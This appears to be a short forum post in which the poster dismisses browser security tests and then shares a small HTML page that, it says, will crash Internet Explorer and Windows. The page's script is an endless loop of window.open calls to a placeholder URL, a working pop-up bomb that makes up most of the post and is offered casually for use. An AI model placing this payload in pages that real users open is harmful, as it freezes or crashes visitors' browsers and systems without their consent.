well I don't trust such tests as they are all known bugs of a specific browser, and they can't prove which browser is safe or not
but here's a small html file will kill IE (and windows as well):
PHP Code:
<script language="javascript">
while (1) {
window.open("http://www.someurl.com");
}
</script>
This doesn't "work" with Konqueror btw
